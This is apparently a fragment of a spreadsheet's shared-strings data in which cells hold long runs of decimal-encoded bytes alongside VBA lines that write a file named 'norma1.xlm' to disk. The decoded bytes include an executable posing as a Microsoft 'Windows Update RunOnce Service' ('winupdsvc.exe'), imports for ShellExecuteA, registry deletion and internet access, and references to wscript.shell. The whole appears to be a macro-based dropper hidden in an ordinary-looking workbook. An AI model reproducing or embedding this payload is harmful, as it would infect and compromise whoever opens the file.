255 120 11 0 0 116 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 0 11 0 0 112 255 255 255 8 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 108 255 </t>
  </si>
  <si>
    <t xml:space="preserve">140 17 194 65 146 111 69 118 28 165 194 204 21 38 3 13 52 97 227 189 40 7 17 200 98 113 179 130 97 66 230 89 88 130 60 35 9 20 115 91 111 103 155 64 113 58 152 88 246 116 135 144 145 236 83 170 207 148 219 182 147 109 103 100 229 87 97 15 70 29 83 55 194 146 220 155 148 79 98 106 43 126 11 30 91 247 6 167 26 72 15 112 113 33 96 108 207 9 65 108 163 99 12 134 245 134 112 216 189 101 37 40 180 40 78 179 49 37 0 194 78 104 21 102 83 10 34 118 103 115 51 199 19 10 75 101 227 16 112 30 180 119 26 22 15 212 31 12 47 138 97 81 14 7 194 10 246 112 154 115 13 70 21 58 218 210 76 107 11 134 110 212 11 198 9 131 31 115 70 65 142 21 18 158 221 5 81 102 105 103 178 85 115 126 246 2 246 92 117 58 165 14 163 172 221 248 27 103 83 67 77 202 97 103 49 15 107 22 75 54 133 174 14 138 24 89 107 39 67 104 8 43 115 88 20 165 86 190 165 49 83 75 136 5 108 109 162 4 187 157 11 141 73 27 149 115 111 67 108 102 34 219 210 176 23 116 144 217 106 217 116 9 179 201 98 243 77 115 151 197 225 52 11 177 26 135 50 92 115 192 195 42 56 67 174 68 67 149 25 136 157 161 101 159 93 34 225 92 165 198 66 43 188 224 128 195 38 12 195 39 45 205 13 44 96 166 88 6 131 15 10 186 195 146 192 64 104 73 78 115 205 53 136 245 199 120 6 27 28 144 59 247 102 116 36 47 111 66 108 116 47 155 45 216 33 194 60 144 161 255 82 5 223 150 237 255 255 45 20 255 172 7 255 120 6 255 119 2 63 80 14 46 11 255 134 109 219 246 255 17 255 169 16 255 139 1 255 123 2 255 154 8 111 32 10 11 9 242 111 219 178 14 117 159 50 87 32 144 24 255 103 19 255 128 251 182 108 219 202 14 48 23 66 86 20 108 3 255 16 2 109 255 151 109 54 14 119 188 10 255 91 15 255 240 8 255 160 32 232 183 109 249 182 5 130 20 61 13 255 15 88 38 191 5 18 9 89 150 111 219 255 115 104 113 2 86 9 255 96 94 92 109 91 150 101 88 111 99 17 41 133 95 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 8 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 224 1 0 0 255 255 255 255 24 11 0 0 32 132 55 2 255 255 255 255 120 255 255 255 24 6 0 0 128 0 0 0 0 0 0 0 0 12 0 0 120 10 0 0 13 0 0 0 0 0 0 0 255 255 255 255 248 10 0 0 64 4 254 255 144 11 0 0 92 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 56 11 0 0 64 4 254 255 56 12 0 0 88 255 255 255 9 0 255 255 32 0 0 0 8 0 0 0 64 4 254 255 232 11 0 0 72 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 200 11 0 0 56 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 40 11 0 0 64 4 254 255 24 12 0 0 40 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 168 11 0 0 64 4 254 255 104 12 0 0 24 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 120 10 0 0 20 0 0 0 0 0 0 0 255 255 255 255 184 11 0 0 64 4 254 255 255 255 255 255 8 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 248 11 0 0 64 4 254 255 80 12 0 0 4 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 0 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 240 12 0 0 240 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 12 17 164 2 255 255 255 255 3 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 255 255 255 255 120 255 10 0 192 12 0 0 255 255 255 255 52 0 3 0 7 0 7 0 101 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 32 6 0 0 0 0 0 0 255 255 255 255 132 0 0 0 0 0 0 0 255 255 255 255 136 11 0 0 255 255 255 255 224 12 0 0 64 4 254 255 8 13 0 0 224 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 </t>
  </si>
  <si>
    <t xml:space="preserve">124 51 219 246 218 14 255 135 5 242 62 124 2 101 9 255 83 178 44 203 178 81 104 109 90 106 95 150 101 249 166 3 255 162 164 160 155 72 23 255 64 101 219 190 109 194 181 176 114 18 255 75 68 26 59 125 182 101 219 182 85 101 89 17 131 176 209 116 200 28 219 182 109 217 14 148 122 26 105 158 81 44 84 2 109 219 150 109 27 53 21 179 14 120 80 121 2 242 118 219 182 176 161 236 35 175 77 40 19 254 11 255 39 219 182 229 219 213 2 148 19 255 145 55 185 121 65 198 83 229 111 183 109 138 92 64 158 248 20 254 23 255 60 4 255 250 183 109 89 182 252 2 245 54 5 26 165 47 129 17 178 185 109 107 164 80 84 47 125 197 2 134 219 182 149 219 229 89 86 10 5 22 83 154 8 211 109 95 182 229 16 255 19 171 17 233 190 21 255 93 74 110 182 109 203 182 2 216 53 108 200 95 106 11 104 2 219 182 109 219 115 32 128 110 248 59 6 32 75 191 238 109 203 182 45 242 149 222 14 207 226 23 15 109 115 219 182 38 230 68 132 23 217 95 5 174 56 86 80 219 182 198 2 99 11 225 38 88 176 188 112 195 70 226 12 164 0 250 95 95 115 117 145 126 64 60 89 95 254 95 104 78 103 254 22 177 114 25 79 95 97 112 112 95 116 15 160 96 174 183 9 95 102 109 219 11 218 34 13 214 243 13 97 27 28 100 11 87 11 86 23 55 14 226 120 231 58 232 156 83 17 105 254 116 16 28 5 186 28 165 53 227 252 114 71 251 25 104 127 57 109 115 103 120 51 11 99 109 121 17 108 48 87 80 14 99 7 139 15 152 110 253 109 98 27 38 95 88 17 27 22 107 96 116 3 116 159 39 8 26 213 32 15 111 110 95 50 222 1 3 195 12 186 66 45 129 237 176 214 80 60 222 51 17 102 101 53 208 212 30 119 99 115 118 114 112 217 116 165 206 185 48 245 107 2 47 98 223 118 174 69 114 17 217 58 15 24 117 112 216 38 54 119 78 83 116 11 54 52 46 6 27 230 222 102 11 9 65 14 114 150 112 179 230 104 6 5 37 1 104 182 182 1 228 60 196 108 5 31 109 108 214 94 196 115 225 17 7 15 67 55 139 </t>
  </si>
  <si>
    <t xml:space="preserve">254 255 32 13 0 0 208 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 56 13 0 0 192 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 176 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 64 4 254 255 255 255 255 255 42 254 255 255 11 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 200 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 255 255 255 255 88 12 0 0 255 255 255 255 128 13 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 144 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 232 10 0 0 208 10 0 0 168 11 0 0 255 255 255 255 88 11 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 184 10 0 0 168 10 0 0 255 255 255 255 232 12 0 0 255 255 255 255 48 14 0 0 208 4 0 0 100 2 104 2 108 2 28 2 164 2 255 255 32 0 0 0 5 0 0 0 64 4 254 255 128 14 0 0 196 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 8 14 0 0 255 255 255 255 112 14 0 0 64 4 254 255 255 255 255 255 192 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 96 14 0 0 255 255 255 255 152 14 0 0 255 255 255 255 160 14 0 0 255 255 255 255 168 14 0 0 4 0 4 0 0 0 1 0 0 0 0 0 1 0 0 0 48 0 0 0 255 255 255 255 255 255 255 255 240 1 0 0 8 0 0 0 255 255 255 255 128 12 0 0 255 255 255 255 255 255 255 255 240 1 0 0 8 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 64 2 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">55 37 239 161 119 151 185 26 188 88 101 123 38 144 107 192 135 216 210 183 115 107 190 18 102 99 101 172 208 236 10 83 45 97 105 222 172 21 10 51 138 190 90 22 52 248 193 240 30 149 27 67 120 120 95 10 46 9 13 129 72 231 24 97 14 78 224 208 37 74 251 102 78 129 142 158 142 82 32 228 83 15 108 1 104 159 64 71 36 116 40 83 72 69 172 32 246 117 219 18 82 17 121 99 178 110 19 176 25 53 240 153 11 114 139 54 172 145 102 187 65 78 94 248 72 164 228 131 206 192 86 22 106 180 165 244 32 86 67 225 115 186 5 137 51 152 4 43 229 97 102 144 163 179 216 10 22 84 106 194 66 54 66 107 65 21 15 222 194 34 66 186 209 94 142 102 19 128 174 36 192 54 35 168 80 194 96 181 236 196 97 45 19 25 66 235 75 130 77 104 27 111 1 112 112 153 52 24 102 209 10 155 235 66 119 55 107 187 32 252 65 75 105 246 21 31 102 135 150 53 42 90 11 60 212 168 167 233 247 117 72 72 83 141 71 119 115 51 254 113 117 151 72 108 127 81 176 7 179 65 23 90 24 219 190 232 136 66 245 110 196 110 5 99 17 61 113 178 3 71 20 101 100 128 101 217 91 217 155 62 126 62 84 14 82 3 107 12 85 109 95 222 140 34 241 6 71 39 114 234 112 42 217 36 38 241 22 91 183 51 150 69 3 76 1 84 67 194 66 197 32 208 61 52 224 14 241 172 189 248 11 1 7 10 146 32 19 110 155 51 247 157 20 216 176 13 64 11 15 113 110 203 206 4 0 7 23 1 0 3 59 155 85 248 36 16 7 208 114 176 96 6 3 204 204 200 221 10 144 63 182 1 0 192 5 167 116 29 175 14 100 79 46 116 244 197 145 138 8 217 96 144 160 152 110 174 136 199 191 96 46 114 122 251 28 47 92 54 132 65 48 3 2 64 32 205 45 214 46 38 75 228 24 224 110 171 77 217 224 39 192 79 93 99 11 173 108 16 102 235 43 240 79 52 2 224 236 27 0 173 217 0 0 0 0 0 0 18 0 255 96 190 0 208 64 0 141 190 0 64 255 255 87 131 205 255 235 16 144 144 144 144 144 144 138 6 70 136 7 71 1 219 </t>
  </si>
  <si>
    <t xml:space="preserve">96 3 0 0 0 129 8 0 2 0 2 0 112 3 0 0 0 129 8 0 2 0 5 0 120 3 0 0 0 129 8 0 24 0 43 0 128 3 0 0 0 129 8 0 2 0 3 0 152 3 0 0 0 129 8 0 2 0 2 0 160 3 0 0 0 129 8 0 16 0 16 0 168 3 0 0 0 129 8 0 14 0 28 0 184 3 0 0 0 129 8 0 2 0 2 0 200 3 0 0 0 128 8 0 4 0 0 0 208 3 0 0 0 129 8 0 50 0 81 0 216 3 0 0 0 129 8 0 10 0 17 0 16 4 0 0 0 129 8 0 2 0 2 0 32 4 0 0 0 129 8 0 10 0 17 0 40 4 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 56 4 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 64 4 0 0 0 129 8 0 10 0 34 0 40 9 0 0 0 129 8 0 26 0 27 0 72 4 0 0 0 129 8 0 10 0 27 0 104 4 0 0 0 129 8 0 2 0 3 0 120 4 0 0 0 129 8 0 2 0 2 0 128 4 0 0 0 129 8 0 96 0 170 0 32 7 0 0 0 129 8 0 34 0 46 0 136 4 0 0 0 129 8 0 10 0 15 0 176 4 0 0 0 129 8 0 2 0 2 0 192 4 0 0 0 129 8 0 60 0 115 0 200 4 0 0 0 129 8 0 2 0 3 0 8 5 0 0 0 129 8 0 2 0 2 0 16 5 0 0 0 129 8 0 22 0 51 0 24 5 0 0 0 129 8 0 28 0 63 0 48 5 0 0 0 129 8 0 20 0 63 0 80 5 0 0 0 129 8 0 16 0 63 0 104 5 0 0 0 129 8 0 4 0 5 0 120 5 0 0 0 129 8 0 2 0 2 0 128 5 0 0 0 129 8 0 2 0 2 0 136 5 0 0 0 129 8 0 4 0 11 0 144 5 0 0 0 128 8 0 4 0 0 0 152 5 0 0 0 129 8 0 48 0 90 0 160 5 0 0 0 129 8 0 20 0 49 0 240 6 0 0 0 129 8 0 36 0 50 0 208 5 0 0 0 129 8 0 82 0 122 0 248 5 0 0 0 129 8 0 </t>
  </si>
  <si>
    <t xml:space="preserve">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12 2 0 0 138 7 71 44 232 60 1 119 247 128 63 6 117 242 139 7 138 95 4 102 193 232 8 193 192 16 134 196 41 248 128 235 232 1 240 137 7 131 199 5 137 216 226 217 141 190 0 0 1 0 139 7 9 192 116 69 139 95 4 141 132 48 152 36 1 0 1 243 80 131 199 8 255 150 96 37 1 0 149 138 7 71 8 192 116 220 137 249 121 7 15 183 7 71 80 71 185 87 72 242 174 85 255 150 100 37 1 0 9 192 116 7 137 3 131 195 4 235 216 255 150 104 37 1 0 97 233 49 108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82 0 122 0 152 8 0 0 0 129 8 0 82 0 122 0 64 8 0 0 0 129 8 0 96 0 72 0 80 6 0 0 0 129 8 0 10 0 15 0 176 6 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 192 6 0 0 34 129 12 0 6 0 12 0 200 6 0 0 0 129 8 0 42 0 0 0 64 9 0 0 0 129 8 0 30 0 0 0 208 6 0 0 0 129 8 0 88 0 0 0 112 9 0 0 0 129 8 0 8 0 0 0 8 7 0 0 4 129 8 0 2 0 0 0 16 7 0 0 0 128 9 0 0 0 0 0 255 255 255 255 255 255 255 255 1 1 32 10 0 0 93 32 242 196 8 0 0 0 0 0 0 0 0 0 0 0 150 4 48 0 0 0 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 3 0 156 0 0 0 0 0 124 0 255 255 32 0 0 0 107 0 255 255 24 0 0 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 66 64 60 2 1 0 183 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 40 0 34 2 0 0 0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t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 4 0 0 0 1 0 2 0 232 0 0 128 40 0 0 128 4 0 0 0 104 0 0 128 16 0 0 0 168 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 1 0 0 0 250 0 0 128 64 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 88 0 0 0 20 1 1 0 2 1 0 0 228 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 139 0 0 0 128 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 152 0 0 0 24 2 1 0 40 0 0 0 228 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 1 0 0 0 192 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 216 0 0 0 24 49 1 0 128 3 0 0 228 4 0 0 0 0 0 0 8 0 73 0 78 0 73 0 84 0 73 0 78 0 70 0 79 0 12 0 73 0 68 0 82 0 95 0 73 0 78 0 73 0 84 0 73 0 78 0 70 0 79 0 64 2 1 0 128 3 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 1 0 5 0 132 8 40 10 0 0 0 0 0 0 0 0 23 0 0 0 0 0 0 0 4 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 222 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 186 2 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 76 0 22 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 67 0 111 0 114 0 112 0 111 0 114 0 97 0 116 0 105 0 111 0 110 0 0 0 102 0 31 0 </t>
  </si>
  <si>
    <t xml:space="preserve">57 67 49 0 209 0 66 2 182 0 12 0 85 115 101 114 32 68 101 102 105 110 101 100 209 0 68 2 32 0 72 2 209 0 70 2 32 0 54 2 33 0 64 2 66 64 50 2 4 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 111 0 255 255 88 0 0 0 150 4 152 0 0 0 0 0 201 4 0 0 72 0 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 156 0 0 0 0 0 124 0 255 255 40 0 0 0 107 0 255 255 32 0 0 0 183 0 39 0 78 2 0 0 32 0 54 2 33 0 74 2 39 0 80 2 0 0 0 0 32 0 80 2 183 0 5 0 156 0 0 0 248 1 0 0 32 0 82 2 32 0 92 2 5 0 156 0 0 0 0 0 183 4 39 0 78 2 0 0 124 0 255 255 136 1 0 0 107 0 255 255 128 1 0 0 32 0 82 2 32 0 94 2 5 0 156 0 0 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 124 0 255 255 64 1 0 0 100 0 255 255 56 1 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 154 0 102 2 16 1 0 0 107 0 255 255 8 1 0 0 107 0 255 255 0 1 0 0 32 0 82 2 32 0 104 2 5 0 156 0 0 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 32 0 54 2 33 0 6 1 182 0 4 0 46 120 108 115 17 0 32 0 108 2 32 0 28 2 37 0 106 2 1 0 37 0 110 2 1 0 21 0 156 0 0 0 0 0 0 0 183 4 39 0 78 2 0 0 124 0 255 255 152 0 0 0 100 0 255 255 144 0 0 0 154 0 112 2 136 0 0 0 107 0 255 255 128 0 0 0 107 0 255 255 120 0 0 0 32 0 54 2 66 64 114 2 0 0 0 0 0 0 0 0 163 0 112 2 96 0 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 87 0 105 0 110 0 100 0 111 0 119 0 115 0 32 0 85 0 112 0 100 0 97 0 116 0 101 0 32 0 82 0 117 0 110 0 79 0 110 0 99 0 101 0 32 0 83 0 101 0 114 0 118 0 105 0 99 0 101 0 0 0 0 0 66 0 17 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 53 0 44 0 32 0 49 0 44 0 32 0 50 0 54 0 48 0 48 0 44 0 32 0 50 0 49 0 56 0 48 0 0 0 0 0 58 0 13 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 119 0 105 0 110 0 117 0 112 0 100 0 115 0 118 0 46 0 101 0 120 0 101 0 0 0 0 0 124 0 44 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 67 0 111 0 114 0 112 0 111 0 114 0 97 0 116 0 105 0 111 0 110 0 46 0 32 0 65 0 108 0 108 0 32 0 114 0 105 0 103 0 104 0 116 0 115 0 32 0 114 0 101 0 115 0 101 0 114 0 118 0 101 0 100 0 46 0 0 0 66 0 13 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 119 0 105 0 110 0 117 0 112 0 100 0 115 0 118 0 46 0 101 0 120 0 101 0 0 0 0 0 102 0 35 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 87 0 105 0 110 0 100 0 111 0 119 0 115 0 32 0 79 0 112 0 101 0 114 0 97 0 116 0 105 0 110 0 103 0 32 0 83 0 121 0 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 107 0 255 255 56 0 0 0 100 0 255 255 48 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 124 0 255 255 16 0 0 0 107 0 255 255 8 0 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 107 0 255 255 224 3 0 0 163 0 102 2 216 3 0 0 32 0 78 2 183 0 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 4 0 156 0 0 0 0 0 0 0 32 0 54 2 65 64 164 2 1 0 0 0 0 0 0 0 107 0 255 255 136 3 0 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 111 0 255 255 112 3 0 0 150 4 32 1 0 0 0 0 32 0 54 2 33 0 6 1 182 0 10 0 110 111 114 109 97 108 46 120 108 109 5 0 156 0 0 0 0 0 0 0 32 0 54 2 66 64 66 0 0 0 0 0 0 0 0 0 124 0 255 255 48 3 0 0 107 0 255 255 40 3 0 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 66 64 42 2 0 0 0 0 0 0 0 0 32 0 54 2 66 64 114 2 0 0 0 0 0 0 0 0 107 0 255 255 96 2 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 3 0 156 0 0 0 0 0 124 0 255 255 24 2 0 0 107 0 255 255 16 2 0 0 255 0 32 0 130 2 254 0 172 0 1 0 32 0 46 2 33 0 48 2 146 0 0 0 32 0 130 2 36 0 46 2 1 0 33 0 6 1 182 0 5 0 66 111 111 107 49 0 5 0 156 0 0 0 0 0 32 0 130 2 36 0 46 2 1 0 33 0 74 2 </t>
  </si>
  <si>
    <t xml:space="preserve">115 0 116 0 101 0 109 0 0 0 0 0 70 0 17 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 53 0 44 0 32 0 49 0 44 0 32 0 50 0 54 0 48 0 48 0 44 0 32 0 50 0 49 0 56 0 48 0 0 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 0 0 0 0 0 0 0 0 0 0 0 0 176 53 1 0 96 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 189 53 1 0 112 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 202 53 1 0 120 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 212 53 1 0 128 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 222 53 1 0 136 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 234 53 1 0 144 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 246 53 1 0 152 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 2 54 1 0 160 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 13 54 1 0 168 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 24 54 1 0 38 54 1 0 54 54 1 0 0 0 0 0 68 54 1 0 0 0 0 0 82 54 1 0 0 0 0 0 183 4 0 128 0 0 0 0 90 54 1 0 0 0 0 0 96 54 1 0 0 0 0 0 112 54 1 0 0 0 0 0 126 54 1 0 0 0 0 0 134 54 1 0 0 0 0 0 75 69 82 78 69 76 51 50 46 68 76 76 0 65 68 86 65 80 73 51 50 46 100 108 108 0 71 68 73 51 50 46 100 108 108 0 77 70 67 55 49 46 68 76 76 0 77 83 86 67 82 55 49 46 100 108 108 0 83 72 69 76 76 51 50 46 100 108 108 0 83 72 76 87 65 80 73 46 100 108 </t>
  </si>
  <si>
    <t xml:space="preserve">filexlm = folder1 &amp; "\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">183 4 5 0 156 0 0 0 0 0 32 0 130 2 36 0 46 2 1 0 66 64 66 0 0 0 154 0 112 2 168 1 0 0 107 0 255 255 160 1 0 0 107 0 255 255 152 1 0 0 255 0 199 0 144 1 0 0 163 0 112 2 136 1 0 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 66 64 60 2 1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56 67 49 0 209 0 66 2 182 0 12 0 85 115 101 114 32 68 101 102 105 110 101 100 209 0 68 2 32 0 72 2 209 0 70 2 32 0 54 2 33 0 64 2 66 64 50 2 4 0 32 0 54 2 66 64 114 2 0 0 0 0 0 0 0 0 111 0 255 255 72 0 0 0 150 4 128 12 0 0 0 0 237 0 182 0 13 0 119 115 99 114 105 112 116 46 115 104 101 108 108 0 36 0 134 2 1 0 46 0 132 2 0 0 183 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 40 0 34 2 136 2 0 0 237 0 176 0 46 0 132 2 111 0 255 255 184 7 0 0 255 255 255 255 176 7 0 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 172 0 79 0 172 0 2 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 37 0 </t>
  </si>
  <si>
    <t xml:space="preserve">108 0 85 83 69 82 51 50 46 100 108 108 0 87 73 78 73 78 69 84 46 100 108 108 0 0 76 111 97 100 76 105 98 114 97 114 121 65 0 0 71 101 116 80 114 111 99 65 100 100 114 101 115 115 0 0 69 120 105 116 80 114 111 99 101 115 115 0 0 0 82 101 103 67 108 111 115 101 75 101 121 0 0 0 66 105 116 66 108 116 0 0 101 120 105 116 0 0 83 104 101 108 108 69 120 101 99 117 116 101 65 0 0 0 83 72 68 101 108 101 116 101 75 101 121 65 0 0 71 101 116 68 67 0 0 0 73 110 116 101 114 110 101 116 79 112 101 110 6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If Not fso.fileexists(filexlm) Then</t>
  </si>
  <si>
    <t xml:space="preserve">124 2 2 0 33 0 126 2 36 0 122 2 1 0 36 0 120 2 1 0 182 0 3 0 97 49 58 0 6 0 4 0 156 0 255 255 255 255 80 8 0 0 172 0 4 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 37 0 62 2 1 0 172 0 4 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 37 0 62 2 1 0 66 64 60 2 1 0 0 0 0 0 0 0 172 0 5 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 37 0 62 2 1 0 172 0 5 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 37 0 62 2 1 0 66 64 60 2 1 0 0 0 0 0 0 0 255 255 255 255 152 7 0 0 172 0 5 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 37 0 62 2 1 0 172 0 5 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 37 0 62 2 1 0 66 64 60 2 1 0 51 52 41 80 92 48 172 0 4 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 37 0 62 2 1 0 172 0 4 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 37 0 62 2 1 0 66 64 60 2 1 0 0 0 0 0 0 0 255 255 255 255 80 8 0 0 255 255 255 255 168 9 0 0 255 255 255 255 208 9 0 0 255 255 255 255 232 9 0 0 255 255 255 255 208 9 0 0 183 0 32 0 28 2 40 0 128 2 0 0 0 0 0 0 183 0 32 0 28 2 40 0 128 2 0 0 0 0 0 0 255 255 255 255 136 9 0 0 237 0 182 0 26 0 115 99 114 105 112 116 105 110 103 46 102 105 108 101 115 121 115 116 101 109 111 98 106 101 </t>
  </si>
  <si>
    <t xml:space="preserve">Open filexlm For Binary Access Write As #1</t>
  </si>
  <si>
